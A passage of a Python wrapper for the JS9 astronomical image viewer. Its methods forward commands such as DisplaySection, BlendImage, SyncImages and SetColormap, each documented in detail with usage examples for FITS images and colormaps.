        JS9.DisplayExtension(extid, opts)
        where:
        -  extid: HDU extension number or the HDU's EXTNAME value
        -  opts: object containing options
        This routine allows you to display images and even binary
        tables from a multi-extension FITS file. (See, for example,
        the FITS Primer at http://fits.gsfc.nasa.gov/fits_primer.html
        for information about HDUs and multi-extension FITS).
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'DisplayExtension', 'args': args})
    def DisplaySection(self, *args):
        """
        Extract and display a section of a FITS file
        call:
        JS9.DisplaySection(opts)
        where:
        -  opts: object containing options
        This routine allows you to extract and display a section of FITS file.
        The opts object contains properties specifying how to generate and
        display the section:
        -  xcen: x center of the section in file (physical) coords (required)
        -  ycen: y center of the section in file (physical) coords (required)
        -  xdim: x dimension of section to extract before binning
        -  ydim: y dimension of section to extract before binning
        -  bin: bin factor to apply after extracting the section
        -  filter: for tables, row/event filter to apply when extracting a
           section
        -  separate: if true, display as a separate image (def: to update
           the current image)
        All properties are optional: by default, the routine will extract a bin
        1 image from the center of the file.
        For example, if an image has dimensions 4096 x 4096, then specifying:
        -  center: 1024, 1024
        -  dimensions: 1024, 1024
        -  bin: 2
        will bin the upper left 1024 x 1024 section of the image by 2 to
        produce a 512 x 512 image. Note that 0,0 can be used to specify the
        file center.
        Table filtering allows you to select rows from an FITS binary table
        (e.g., an X-ray event list) by checking each row against an expression
        involving the columns in the table. When a table is filtered, only
        valid rows satisfying these expressions are used to make the image.
        A filter expression consists of an arithmetic or logical operation
        involving one or more column values from a table. Columns can be
        compared to other columns or to numeric constants. Standard JavaScript
        math functions can be applied to columns. JavaScript (or C) semantics
        are used when constructing expressions, with the usual precedence and
        associativity rules holding sway:
        Operator                Associativity
        --------                -------------
        ()                      left to right
        !  (bitwise not) - (unary minus)   right to left
        *  /                    left to right
        +  -                    left to right
        <  <= > >=              left to right
        == !=                   left to right
        &  (bitwise and)        left to right
        ^  (bitwise exclusive or)  left to right
        |  (bitwise inclusive or)  left to right
        && (logical and)        left to right
        || (logical or)         left to right
        =                       right to left
        For example, if energy and pha are columns in a table, then the
        following are valid expressions:
        pha > 1
        energy == pha
        pha > 1 && energy <= 2
        max(pha,energy) >= 2.5
        NB: JS9 uses cfitsio by default (you can, but should not, use the
        deprecated fitsy.js), and therefore follows cfitsio filtering
        conventions, which are documented in:
        https://heasarc.gsfc.nasa.gov/docs/software/fitsio/c/c_user/node97.html
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'DisplaySection', 'args': args})
    def DisplaySlice(self, *args):
        """
        Display a slice of a FITS data cube
        call:
        JS9.DisplaySlice(slice, opts)
        where:
        -  slice: slice description or slice number
        -  opts: object containing options
        This routine allows you to display a 2D slice of a 3D or 4D
        FITS data cube, i.e. a FITS image containing 3 or 4 axes.
        The slice parameter can either be the numeric value of the
        slice in the third (or fourth) image dimension (starting
        with 1) or it can be a slice description string: a combination
        of asterisks and a numeric value defines the slice axis. Thus, for
        example, in a 1024 x 1024 x 16 cube, you can display the sixth slice
        along the third axis in one of two ways:
          >>> JS9.DisplaySlice(6)
        or:
          >>> JS9.DisplaySlice("*,*,6")
        If the image was organized as 16 x 1024 x 1024, you would use the
        string description:
          >>> JS9.DisplaySlice("6,*,*")
        By default, the new slice replaces the data in the currently displayed
        image. You can display the slice as a separate image by supplying
        an opts object with its separate property set to true.
        For example:
          >>> JS9.DisplaySlice("6,*,*", {separate: true})
        will display the sixth slice of the first image dimension separately
        from the original file, allowing blinking, image blending, etc. between
        the two "files". Note that the new id and filename are adjusted to be
        the original file's values with the cfitsio image section [6:6,*,*]
        appended.
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'DisplaySlice', 'args': args})
    def MoveToDisplay(self, *args):
        """
        Move an image to a new JS9 display
        call:
        JS9.MoveToDisplay(dname)
        where:
        -  dname: name of JS9 display to which the current image will be moved
        The JS9.MoveToDisplay() routine moves the current image to the
        specified display:
          >>> JS9.MoveToDisplay("myJS9")
        will move the current image displayed in the "JS9" display window to
        the "myJS9" window.
        Note that the new JS9 display must already exist. New displays can be
        created with the JS9.LoadWindow() public access routine or
        the File:new JS9 light window menu option.
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'MoveToDisplay', 'args': args})
    def BlendImage(self, *args):
        """
        Blend the image in an image stack using W3C composite/blend modes
        call:
        JS9.BlendImage(blendMode, opacity)
        calling sequences:
        JS9.BlendImage()                   # return current blend params
        JS9.BlendImage(true||false)        # turn on/off blending
        JS9.BlendImage(mode, opacity)      # set blend mode and/or opacity
        where:
        -  mode: one of the W3C blend modes
        -  opacity: the opacity of the blended image (percent from 0 to 1)
        Image processing programs such as Adobe Photoshop and Gimp allow you
        to blend a stack of images together by mixing the RGB colors. The W3C
        has defined a number of composite and blending modes which have been
        implemented by Firefox, Chrome, and Safari (what about IE?):
        -  normal
        -  multiply
        -  screen
        -  overlay
        -  darken
        -  lighten
        -  color-dodge
        -  color-burn
        -  hard-light
        -  soft-light
        -  difference
        -  exclusion
        -  hue
        -  saturation
        -  color
        -  luminosity
        In addition, the following Porter-Duff compositing modes are available
        (though it's unclear how useful they are in JS9 image processing):
        -  clear
        -  copy
        -  source-over
        -  destination-over
        -  source-in
        -  destination-in
        -  source-out
        -  destination-out
        -  source-atop
        -  destination-atop
        -  xor
        -  lighter
        Blending and compositing modes are described in detail in:
        https://www.w3.org/TR/compositing-1
        https://developer.mozilla.org/en-US/docs/Web/API/Canvas_API/Tutorial/Compositing
        JS9 allows you to use these modes to blend images together. If
        you load two images of the same object into JS9, you can use
        the JS9.ReprojectData() routine to align them by WCS. You then
        can blend one image into the other by specifying a blend mode
        and an optional opacity. For example, if chandra.fits and
        spitzer.fits are two aligned images of the same object, and
        chandra.fits is currently being displayed, you can blend
        spitzer into chandra using the "screen" blend and opacity 0.9
        mode this way:
          >>> JS9.BlendImage("screen", 0.9)
        After the spitzer image is blended, both images will be
        displayed as part of the chandra.fits display. However,
        changing the colormap, scale, contrast, or bias will only
        affect the current chandra image, not the blended spitzer
        part. In this way, you can continue to manipulate the current
        image and the image blending will update automatically.
        Also note that the spitzer image is still available separately
        for display and manipulation. You can switch to displaying
        spitzer and change colormap, scale, bias, contrast, etc. But
        since the images are now blended, changes to spitzer will be
        reflected in the spitzer part of the blended chandra
        display. Thus, if you change the colormap on the display of
        spitzer, and change back to chandra, the blended chandra image
        will utilize the new colormap.
        This linkage is maintained during zoom and pan operations. If
        you display the blended chandra image and then zoom or pan it,
        both images will be updated correctly to maintain
        alignment. But note that this means when you go back to the
        spitzer display, its zoom and/or pan values will have been
        updated. In this way, the spitzer image always is correctly
        linked to the blended version.
        The JS9.BlendImage() call accepts a variable number of
        arguments to perform a variety of functions:
        JS9.BlendImage() returns an object containing the following properties:
        -  active: boolean specifying whether this image is to be blended
        -  mode: string specifying the blend mode
        -  opacity: opacity value (0 to 1)
          >>> JS9.BlendImage()  # returns a blend object for the current image
          >>> JS9.BlendImage(true||false)  # turns on/off blending of
          >>> JS9.BlendImage(blend, opacity)  # set/modify blend mode or opacity
        """
        # thin wrapper: forward the call to the JS9 helper
        return self.send({'cmd': 'BlendImage', 'args': args})
def SyncImages(self, *args):
"""
Synchronize operations between two or more images
call:
JS9.SyncImages([ops], [images], [opts]) # set up synchronization
JS9.SyncImages(true||false) # turn on/off synchronization
where:
- ops: array of operations on which to sync
- images: array of images to sync with this image
- opts: options for sync'ing
Synchronize two or more images, so that when an operation is performed
on one image, it also is performed on the other(s). For example, when
the colormap or scale is changed on an image, it also is changed on
the sync'ed images. Or, when a region is created, moved, resized, or
removed on an image, the same happens on the sync'ed images.
When the SyncImages() call is invoked, the current image is
configured to synchronize the specified images. In addition, if
the reciprocate property is set in the opts object (see below),
the other images are also configured to synchronize one another (as
well as the current image). Once configuration is complete, a sync
command is executed immediately. If the current image already
displays one or more regions, these will be created in the target
images.
The operations that can be specified for sync'ing are:
"colormap", "pan", "regions", "scale", "wcs", "zoom", "contrastbias".
If no array is specified, the default array in JS9.globalOpts.syncOps
is used.
Images to synchronize can be specified as an array of image handles or
image ids. If no array is specified, all currently displayed images
are sync'ed.
The optional opts object can contain:
- reciprocate: boolean determining whether images sync one another
- reverse: boolean to reverse this image and target images (def: false)
If the opts object is not specified, the default value of
reciprocate is the value of the JS9.globalOpts.syncReciprocate
property.
Examples:
>>> # the current image will sync all operations for all images
>>> # sync reciprocally, so that changing any image syncs the others
>>> SyncImages()
>>> # current image will sync specified ops for foo1.fits,foo2.fits:
>>> SyncImages(["scale", "colormap"], ["foo1.fits", "foo2.fits"])
>>> # the current image will sync two images with default ops,
>>> # but the two images themselves will not sync images reciprocally
>>> SyncImages(null, ["foo1.fits", "foo2.fits"], {reciprocate: false});
Note that if the pan operation syncs two images having differently
sized fields of view, the smaller image will stop panning when it
reaches its edge, rather than displaying a blank field.
You can turn on/off syncing for a given image by specifying a single
boolean argument:
>>> # turn off sync'ing temporarily
>>> SyncImages(false);
This is different from unsync'ing in that you can turn sync'ing back
on without having to re-sync the images.
"""
return self.send({'cmd': 'SyncImages', 'args': args})
def UnsyncImages(self, *args):
"""
Unsynchronize two or more previously synchronized images
call:
JS9.UnsyncImages([ops], [images], [opts]) # clear synchronization
where:
- ops: array of operations to unsync
- images: array of images to unsync with this image
- opts: options for unsync'ing
Unsynchronize previously sync'ed images.
The operations that can be specified for unsync'ing are:
"colormap", "pan", "regions", "scale", "wcs", "zoom", "contrastbias".
If no array is specified, the default array in JS9.globalOpts.syncOps is
used. Thus, you can turn off sync'ing for specified operations, while
leaving others to be sync'ed.
Images to be unsync'ed can be specified as an array of image handles or
image ids. If no array is specified, all currently displayed images
are unsync'ed.
The optional opts object can contain:
- reciprocate: boolean determining whether images sync one another
- reverse: boolean to reverse this image and target images (def: false)
If the opts object is not specified, the default is to reciprocate based
on the value of the JS9.globalOpts.syncReciprocate property.
Examples:
>>> # this image won't sync on scale for foo1.fits and foo2.fits,
>>> # and they also will stop sync'ing
UnsyncImages(["scale"], ["foo1.fits", "foo2.fits"])
>>> # this image will still sync foo1.fits and foo2.fits, but
>>> # foo1.fits and foo2.fits will no longer sync this image:
UnsyncImages(null, ["foo1.fits", "foo2.fits"],
{reverse: true, reciprocal: false})
"""
return self.send({'cmd': 'UnsyncImages', 'args': args})
def MaskImage(self, *args):
"""
Mask an image using values in another image
call:
JS9.MaskImage(image, opts)
calling sequences:
JS9.MaskImage() # return current mask params
JS9.MaskImage(true||false) # turn on/off masking
JS9.MaskImage(image, opts) # set mask and optionally, its params
JS9.MaskImage(opts) # set mask params
where:
- image: image handle or image id to use as a mask
- opts: optional mask properties
and where the mask properties are:
- mode: "mask", "opacity", or "overlay"
- value: mask value that triggers masking (def: 0) for "mask" mode
- invert: whether to invert the mask (def: false) for "mask" mode
- def: object containing default RGBA values for "overlay" mode
- opacity: opacity when masking (def: 0, range 0 to 1) for both mode
The pixel values in one image can be used to mask the pixels in
another image if the two images have the same image dimensions.
The type of masking depends on the mode: "overlay" (default) or "mask".
For "mask" mode, if the value of a pixel in the mask is less than or
equal to the value property, the opacity of the displayed pixel
is set to the opacity property. You can also invert the mask
using the invert property. In effect, this mode displays only
the image pixels "covered" by a mask.
For "opacity" mode, each image pixel is assigned an opacity equal
to the value of the mask pixel (whose values are assumed to range
from 0 to 1.)
For "overlay" mode, if the mask pixel has a non-zero alpha, its color
is blended with the image pixel using source-atop composition.
Otherwise, the image pixel color alone is used in the display.
This is one way you can display a mask overlay on top of an image.
A static colormap is usually used in conjunction with an overlay
mask, since pixel values not explicitly assigned a color are
transparent. Note that, when blending a mask and image pixel, the
global mask opacity and the individual pixel opacity are multiplied to
get the final pixel opacity.
To set up a mask initially, call the routine with an already-loaded
mask image as the first parameter, and an optional opts object as the
second parameter:
>>> # default is "overlay"
>>> JS9.ImageMask("casa_mask.fits");
>>> JS9.ImageMask("casa_mask.fits", {mode: "overlay"});
>>> # "mask" mode: set lower threshold for masking and masked opacity
>>> JS9.ImageMask("mask.fits",{"mode":"mask","value":5,"opacity":0.2});
You can change the mask parameters at any time:
>>> JS9.ImageMask({value: 2, opacity: 0});
or temporarily turn off and on the mask:
>>> JS9.ImageMask(false);
>>> ...
>>> JS9.ImageMask(true);
"""
return self.send({'cmd': 'MaskImage', 'args': args})
def BlendDisplay(self, *args):
"""
Set global blend mode for specified display
call:
mode = JS9.BlendDisplay(True|False)
returns:
- mode: current image blend mode
This routine will turn on/off the global image blend mode for the
specified display. If no argument is specified, it returns the current
blend mode.
"""
return self.send({'cmd': 'BlendDisplay', 'args': args})
def GetColormap(self, *args):
"""
Get the image colormap
call:
cmap = JS9.GetColormap()
returns:
- cmap: an object containing colormap information.
The returned cmap object will contain the following properties:
- colormap: colormap name
- contrast: contrast value (range: 0 to 10)
- bias: bias value (range 0 to 1)
"""
return self.send({'cmd': 'GetColormap', 'args': args})
def SetColormap(self, *args):
"""
Set the image colormap
call:
JS9.SetColormap(cmap, [contrast, bias])
calling sequences:
JS9.SetColormap(colormap)
JS9.SetColormap(colormap, contrast, bias)
JS9.SetColormap(colormap, staticOpts)
JS9.SetColormap(contrast, bias)
JS9.SetColormap(staticOpts)
where:
- cmap: colormap name
- contrast: contrast value (range: 0 to 10)
- bias: bias value (range 0 to 1)
- staticOpts: static colormap opts
Set the current colormap, contrast/bias, or both. This call takes one
(colormap), two (contrast, bias) or three (colormap, contrast, bias)
arguments. It also takes the following single arguments:
- rgb: toggle RGB mode
- invert: toggle inversion of the colormap
- reset: reset contrast, bias, and invert values
- staticOpts: opts for a static colormap
The staticOpts argument is an array of parameters to change
in a static colormap. Each parameter can take one of two forms:
- [color, min, max]
- [color, opacity|alpha]
- [color, true|false]
The color parameter must match one of the colors specified when
the static colormap was created. The min and max properties replace
the originally specified min and max values. Specifying a number
between 0 and 1 (inclusive) will change the opacity, while specifying
a number greater than 1 will change the alpha (i.e., opacity * 255).
Specifying true or false will set or unset the active flag for that
color, i.e. it will turn on or off use of that color. When turned off,
the pixels in that range will be transparent. For example:
>>> SetColormap '[["red", 0.5], ["green", true], ["blue", false]]'
sets the opacity of red pixels to 0.5, turns on the green pixels,
and turns off the blue pixels in the currently active static colormap.
"""
return self.send({'cmd': 'SetColormap', 'args': args})
def SaveColormap(self, *args):
"""
Save colormap(s)
calling sequences:
JS9.SaveColormap() # save current colormap to "js9.cmap"
JS9.SaveColormap(fname) # save current colormap to fname
JS9.SaveColormap(cmapArray) # save array of ccmaps to "js9.cmap"
JS9.SaveColormap(fname, cmapArray) # save array of cmaps to fname
where:
- fname: output file name
- cmapArray: optional array of colormap names to save
As shown by the calling sequences above, you can use this routine to
save either the current colormap or a list of colormaps taken from the
specified array. You also can choose to save to a particular filename
or the default "js9.cmap":
>>> # save the current colormap in js9.cmap
>>> JS9.SaveColormap()
>>> # save the current colormap in foo.cmap
>>> JS9.SaveColormap("foo.cmap")
>>> # save the foo1 and foo2 colormaps in js9.cmap
>>> JS9.SaveColormap(["foo1", "foo2"])
>>> # save the user-defined foo1 and foo2 colormaps in foo.cmap
>>> JS9.SaveColormap("foo.cmap", ["foo1", "foo2"])
The colormaps are saved in JSON format. Multiple saved colormaps will
be stored in a JSON array, while a single saved colormap will be saved
at the top level.
Don't forget that the file is saved by the browser, in whatever
location you have set up for downloads.
"""
return self.send({'cmd': 'SaveColormap', 'args': args})
def AddColormap(self, *args):
"""
Add a colormap to JS9
call:
JS9.AddColormap(name, aa|rr,gg,bb|obj|json)
where:
- name: colormap name
- aa: an array containing RGB color triplets
- rr,gg,bb: 3 arrays of vertices specifying color changes
- obj: object containing one of the two colormap definition formats
- json: json string containing one of the colormap definition formats
You can add new colormaps to JS9 using one of two formats. The
first is an array of RGB triplets (i.e. an array of 3-D
arrays), where each triplet defines a color. The elements of
the colormap are divided evenly between these 3-D triplets.
For example, the i8 colormap is defined as:
>>> JS9.AddColormap("i8",
[[0,0,0], [0,1,0], [0,0,1], [0,1,1], [1,0,0],
[1,1,0], [1,0,1], [1,1,1]]))
Here, the colormap is divided into 8 sections having the
following colors: black, green, blue, cyan (green + blue),
red, yellow (red + green), purple (red + blue), and white. A
colormap such as sls also utilizes an array of RGB triplets,
but it has 200 entries, leading to much more gradual
transitions between colors.
The second colormap format consists three arrays of vertices
defining the change in intensity of red, green, and blue,
respectively. For each of these three color triplets, the
first coordinate of each vertex is the x-distance along the
colormap axis (scaled from 0 to 1) and the second coordinate
is the y-intensity of the color. Colors are interpolated
between the vertices. For example, consider the following:
>>> JS9.AddColormap("red",
[[0,0],[1,1]], [[0,0], [0,0]], [[0,0],[0,0]])
>>> JS9.AddColormap("blue",
[[0,0],[0,0]], [[0,0], [0,0]], [[0,0],[1,1]])
>>> JS9.AddColormap("purple",
[[0,0],[1,1]], [[0,0], [0,0]],[[0,0],[1,1]])
In the red (blue) colormap, the red (blue) array contains two
vertices, whose color ranges from no intensity (0) to full
intensity (1) over the whole range of the colormap (0 to
1). The same holds true for the purple colormap, except that
both red and blue change from zero to full intensity.
For a more complicated example, consider the a colormap, which is
defined as:
>>> JS9.AddColormap("a",
[[0,0], [0.25,0], [0.5,1], [1,1]],
[[0,0], [0.25,1], [0.5,0], [0.77,0], [1,1]],
[[0,0], [0.125,0], [0.5, 1], [0.64,0.5],
[0.77, 0], [1,0]])
Here we see that red is absent for the first quarter of the
colormap, then gradually increases to full intensity by the
half mark, after which it stays at full intensity to the
end. Green ramps up to full intensity in the first quarter,
then drops to zero by the half and stays that way until a bit
more than three-quarters along, after which it gradually
increases again. Blue starts off at no intensity for an
eighth, then gradually increases to full intensity by the
half-way mark, decreasing gradually to zero by the
three-quarter mark. The result is that you see, for example,
green at the beginning and yellow (red + green) at the end,
with some purple (red + blue) in the middle of the colormap.
As a convenience, you also can pass an object or json string
containing the colormap definition:
# RGB color triplets for the I8 colormap in a "colors" property
{"name":"i8",
"colors":[[0,0,0],[0,1,0],[0,0,1],[0,1,1],
[1,0,0],[1,1,0],[1,0,1],[1,1,1]]}
# all 3 vertex arrays for purple colormap in one "vertices" property
{"name":"purple",
"vertices":[[[0,0],[1,1]],[[0,0],[0,0]],[[0,0],[1,1]]]}
Finally, note that JS9.AddColormap() adds its new colormap to
all JS9 displays on the given page.
"""
return self.send({'cmd': 'AddColormap', 'args': args})
def LoadColormap(self, *args):
"""
Load a colormap file into JS9
LoadColormap(filename)
where:
- filename: input file name or URL
Load the specified colormap file into the web page. The filename,
which must be specified, can be a local file (with absolute path or a
path relative to the displayed web page) or a URL. It should contain a
JSON representation of a colormap, either in RGB color format or in
vertex format (see AddColormap() above):
>>> # RGB color format
>>> {
>>> "name": "purplish",
>>> "colors": [
>>> [0.196, 0.196, 0.196],
>>> [0.475, 0, 0.608],
>>> [0, 0, 0.785],
>>> [0.373, 0.655, 0.925],
>>> [0, 0.596, 0],
>>> [0, 0.965, 0],
>>> [1, 1, 0],
>>> [1, 0.694, 0],
>>> [1, 0, 0]
>>> ]
>>> }
>>> # vertex format
>>> {
>>> "name": "aips0",
>>> "vertices": [
>>> [
>>> [0.203, 0],
>>> [0.236, 0.245],
>>> [0.282, 0.5],
>>> [0.342, 0.706],
>>> [0.411, 0.882],
>>> [0.497, 1]
>>> ],
>>> [
>>> [0.394, 0],
>>> [0.411, 0.196],
>>> [0.464, 0.48],
>>> [0.526, 0.696],
>>> [0.593, 0.882],
>>> [0.673, 1],
>>> [0.94, 1],
>>> [0.94, 0]
>>> ],
>>> [
>>> [0.091, 0],
>>> [0.091, 0.373],
>>> [0.262, 1],
>>> [0.94, 1],
>>> [0.94, 0]
>>> ] ]
>>> }
As with AddColormap(), the new colormap will be available
in all displays.
"""
return self.send({'cmd': 'LoadColormap', 'args': args})
def GetRGBMode(self, *args):
"""
Get RGB mode information
call:
rgbobj = JS9.GetRGBMode()
returns:
- rgbobj: RGB mode information
This routine returns an object containing the following RGB mode
information:
- active: boolean specifying whether RGB mode is active
- rid: image id of "red" image
- gid: image id of "green" image
- bid: image id of "blue" image
"""
return self.send({'cmd': 'GetRGBMode', 'args': args})
def SetRGBMode(self, *args):
"""
call:
JS9.SetRGBMode(mode, [imobj])
where:
- mode: boolean true to activate RGB mode, false to disable
- imobj: optional object specifying three images to set to the
"red", "green", and "blue" colormaps
In RGB mode, three images assigned the "red", "green", and "blue"
colormaps are displayed as a single image. The RGB color of each
displayed pixel is a combination of the "red", "green", and "blue"
pixel value taken from the appropriate image. Note that all three
images are not required: you can display an RGB image using two of
the three colors simply by not assigning the third colormap.
The SetRGBMode() call turns on or off RGB mode. The
boolean mode argument specifies whether to activate or
de-activate RGB mode. The optional imobj object specifies
(already-loaded) images to assign to the three colormaps:
- rid: image id (or handle) to set to the "red" colormap
- gid: image id (or handle) to set to the "green" colormap
- bid: image id (or handle) to set to the "blue" colormap
If imobj is not specified, it is assumed that images have been
assigned the "red", "green", and "blue" colormaps by another means.
(Once again, it is not necessary to assign all three colormaps.)
"""
return self.send({'cmd': 'SetRGBMode', 'args': args})
def GetOpacity(self, *args):
"""
Get the image opacity
call:
opacity = JS9.GetOpacity()
returns:
- opacity: opacity object
The returned opacity object will contain the following properties:
- opacity: opacity value assigned to image pixels
- flooropacity: opacity assigned when the image pixel value is
less than or equal to the floor value (if defined)
- floorvalue: floor value to test image pixel values against
(if defined)
"""
return self.send({'cmd': 'GetOpacity', 'args': args})
def SetOpacity(self, *args):
"""
Set the image opacity
calling sequences:
JS9.SetOpacity(opacity) # set default opacity for all image pixels
JS9.SetOpacity(fvalue, fopacity) # pixels <= fvalue use fopacity
JS9.SetOpacity(opacity, fvalue, fopacity) # set def and floor opacity
JS9.SetOpacity("reset") # reset default opacity to 1
JS9.SetOpacity("resetfloor") # remove opacity floor
JS9.SetOpacity("resetall") # reset def opacity to 1, remove floor
where:
- opacity: opacity value for image pixels
- floorvalue: floor value to test image pixel values against
- flooropacity: floor opacity value to set
Set the current opacity, floor opacity, or both. This call takes one
(opacity), two (floorvalue, flooropacity) or three (opacity,
floorvalue, flooropacity) arguments.
The floor value & opacity option allows you to set the opacity
for pixels whose image value is less then or equal to a specified
floor value. It takes two arguments: the floor pixel value to check,
and the floor opacity to apply. For example, when both arguments are 0,
pixels whose image values are less than or equal to 0
will be transparent. Specifying 5 and 0.5, respectively, means that
pixels whose image values less than or equal to 5 will have an opacity
of 0.5. A useful case is to make the pixels transparent at a
given value, allowing features of one image to be blended into
another, without blending extraneous pixels.
The various reset options allow you to reset the default value,
floor values, or both.
"""
return self.send({'cmd': 'SetOpacity', 'args': args})
def GetZoom(self, *args):
"""
Get the image zoom factor
call:
zoom = JS9.GetZoom()
returns:
- zoom: floating point zoom factor
"""
return self.send({'cmd': 'GetZoom', 'args': args})
def SetZoom(self, *args):
"""
Set the image zoom factor
call:
JS9.SetZoom(zoom)
where:
- zoom: floating or integer zoom factor or zoom directive string
The zoom directives are:
- x[n]|X[n]: multiply the zoom by n (e.g. 'x2')
- /[n]: divide the zoom by n (e.g. '/2')
- in|In: zoom in by a factor of two
- out|Out: zoom out by a factor of two
- toFit|ToFit: zoom to fit image in display
"""
return self.send({'cmd': 'SetZoom', 'args': args})
def GetPan(self, *args):
"""
Get the image pan position
call:
ipos = JS9.GetPan()
returns:
- ipos: object containing image information for pan
The returned ipos object will contain the following properties:
- x: x image coordinate of center
- y: y image coordinate of center
"""
return self.send({'cmd': 'GetPan', 'args': args})
def SetPan(self, *args):
"""
Set the image pan position
call:
JS9.SetPan(x, y)
where:
- x: x image coordinate
- y: y image coordinate
Set the current pan position using image coordinates. Note that you can
use JS9.WCSToPix() and JS9.PixToWCS() to convert between image
and WCS coordinates.
"""
return self.send({'cmd': 'SetPan', 'args': args})
def AlignPanZoom(self, *args):
"""
Align pan and zoom of the current image to a target image
call:
JS9.AlignPanZoom(im)
where:
- im: image containing the WCS used to perform the alignment
This routine changes the pan and zoom of the current image to match a
target image, assuming both have WCS info available. The image is
panned to the RA, Dec at the center of the target image's display. The
zoom is also matched. The pixel size (as specified by the FITS CDELT1
parameter) will be taken into account when zooming, but not the image
rotation or flip. This routine is faster than ReprojectData() for
aligning reasonably similar images.
No attempt is make to keep the images aligned after the call. This
allows you to make adjustments to the current and/or target images and
then re-align as needed.
"""
return self.send({'cmd': 'AlignPanZoom', 'args': args})
def GetScale(self, *args):
"""
Get the image scale
call:
scale = JS9.GetScale()
returns:
- scale: object containing scale information
The returned scale object will contain the following properties:
- scale: scale name
- scalemin: min value for scaling
- scalemax: max value for scaling
"""
return self.send({'cmd': 'GetScale', 'args': args})
def SetScale(self, *args):
"""
Set the image scale
call:
JS9.SetScale(scale, smin, smax)
where:
- scale: scale name
- smin: scale min value
- smax: scale max value
Set the current scale, min/max, or both. This call takes one (scale),
two (smin, max) or three (scale, smin, smax) arguments.
"""
return self.send({'cmd': 'SetScale', 'args': args})
def GetFlip(self, *args):
"""
Get flip state of an image
call:
flip = JS9.GetFlip()
returns:
- flip: current flip state
Possible returned flip states are: "x", "y", "xy", or "none".
"""
return self.send({'cmd': 'GetFlip', 'args': args})
def SetFlip(self, *args):
"""
Flip an image around the x or y axis
call:
JS9.SetFlip(flip)
where:
- flip: "x", "y"
Flip an image around the specified axis. Flipping is relative to the
current state of the display, so flipping by x twice will return you
to the original orientation.
Since this operation is applied to the entire display canvas instead
of the image, image parameters such as the WCS are not affected.
"""
return self.send({'cmd': 'SetFlip', 'args': args})
def GetRotate(self, *args):
"""
Get the rotate state of an image
call:
flip = JS9.GetRotate()
returns:
- rot: current rotation value for this image
Return the current rotation.
"""
return self.send({'cmd': 'GetRotate', 'args': args})
def SetRotate(self, *args):
"""
Rotate an image by a specified number of degrees
call:
JS9.SetRotate(rot)
where:
- rot: rotation in degrees
Set the rotation of an image to the specified number of degrees. The
rotation is performed in terms of an absolute angle: if you rotate by
20 degrees and then do it again, there is no change. Also, setting the
rotation to 0 sets the angle to 0.
Since this operation is applied to the entire display canvas instead
of the image, image parameters such as the WCS are not affected.
"""
return self.send({'cmd': 'SetRotate', 'args': args})
def GetRot90(self, *args):
"""
Get the rotate state of an image
call:
flip = JS9.GetRot90()
returns:
- rot: current rotation value for this image
The returned rotation value will be a multiple of 90, depending on
how many rotations have been executed and in which direction.
"""
return self.send({'cmd': 'GetRot90', 'args': args})
def SetRot90(self, *args):
"""
Rotate an image by +/- 90 degrees
call:
JS9.SetRot90(rot)
where:
- rot: +/- 90
Rotate an image by a multiple of 90 degrees. Rot90 rotations are
relative to the current state of the display, so four rotations will
return you to the original orientation.
Since this operation is applied to the entire display canvas instead
of the image, image parameters such as the WCS are not affected.
"""
return self.send({'cmd': 'SetRot90', 'args': args})
def GetParam(self, *args):
"""
Get an image parameter value
val = GetParam(param)
where:
- param: name of the parameter
returns:
- val: value of the parameter
Return the value of an image parameter. The available parameters are
listed below in the SetParam() section.
"""
return self.send({'cmd': 'GetParam', 'args': args})
def SetParam(self, *args):
"""
Set an image parameter value
ovalue = SetParam(param, value)
where:
- param: name of the parameter
- val: new value of the parameter
returns:
- ovalue: the previous value of the parameter
A number of miscellaneous image parameters are copied from the
JS9.imageOpts object to each image when it is first loaded. You can
use the SetParam() routine to modify these values subsequently.
The available parameters and their current default values are listed
below:
- exp: 1000, default exp value for scaling
- listonchange: false, list regions after a region change?
- opacity: 1.0, image display opacity, between 0 and 1
- nancolor: "#000000", 6-digit #hex color for NaN values
- valpos: true, display value/position?
- wcsalign: true, align image using wcs after reproj?
- xeqonchange: true, xeq an onchange callback after a region change?
- zscalecontrast: 0.25, default zscale value from ds9
- zscalesamples: 600, default zscale value from ds9
- zscaleline: 120, default zscale value from ds9
The routine returns the previous value of the parameter, which can
be useful when temporarily turning off a function. For example:
>>> oval = SetParam("xeqonchange", false);
>>> .... processing ...
>>> SetParam("xeqonchange", oval);
will temporarily disable execution of the previously defined regions
onload callback, resetting it to the old value after processing
is complete.
"""
return self.send({'cmd': 'SetParam', 'args': args})
def GetValPos(self, *args):
"""
Get value/position information
call:
valpos = JS9.GetValPos(ipos)
where:
- ipos: image position object containing x and y image coord values
returns:
- valpos: value/position object
This routine determines the data value at a given image position and
returns an object containing the following information:
- ix: image x coordinate
- iy: image y coordinate
- isys: image system (i.e. 'image')
- px: physical x coordinate
- py: physical y coordinate
- psys: currently selected pixel-based system (i.e. 'image' or
'physical') for the above px, py values
- ra: ra in degrees (if WCS is available)
- dec: dec in degrees (if WCS is available)
- wcssys: wcs system (if WCS is available)
- val: floating point pixel value
- val3: pixel value as a string truncated to 3 decimal digits
- vstr: string containing value and position info
- id: id of the image
- file: filename of the image
- object: object name of the image from the FITS header
"""
return self.send({'cmd': 'GetValPos', 'args': args})
def PixToWCS(self, *args):
"""
Convert image pixel position to WCS position
call:
wcsobj = JS9.PixToWCS(x, y)
where:
- x: x image coordinate
- y: y image coordinate
returns:
- wcsobj: world coordinate system object
The wcs object contains the following properties:
- ra: right ascension in floating point degrees
- dec: declination in floating point degrees
- sys: current world coordinate system being used
- str: string of wcs in current system ('[ra] [dec] [sys]')
"""
return self.send({'cmd': 'PixToWCS', 'args': args})
def WCSToPix(self, *args):
"""
Convert WCS position to image pixel position
call:
pixobj = JS9.WCSToPix(ra, dec)
where:
- ra: right ascension in floating point degrees
- dec: declination in floating point degrees
returns:
- pixobj: pixel object
The pixel object contains the following properties:
- x: x image coordinate
- y: y image coordinate
- str: string of pixel values ('[x]' '[y]')
"""
return self.send({'cmd': 'WCSToPix', 'args': args})
def ImageToDisplayPos(self, *args):
"""
Get the display coordinates from the image coordinates
call:
dpos = JS9.ImageToDisplayPos(ipos)
where:
- ipos: image position object containing x and y image coordinate
values
returns:
- dpos: display position object containing x and y display
coordinate values
Get display (screen) coordinates from image coordinates. Note that
image coordinates are one-indexed, as per FITS conventions, while
display coordinate are 0-indexed.
"""
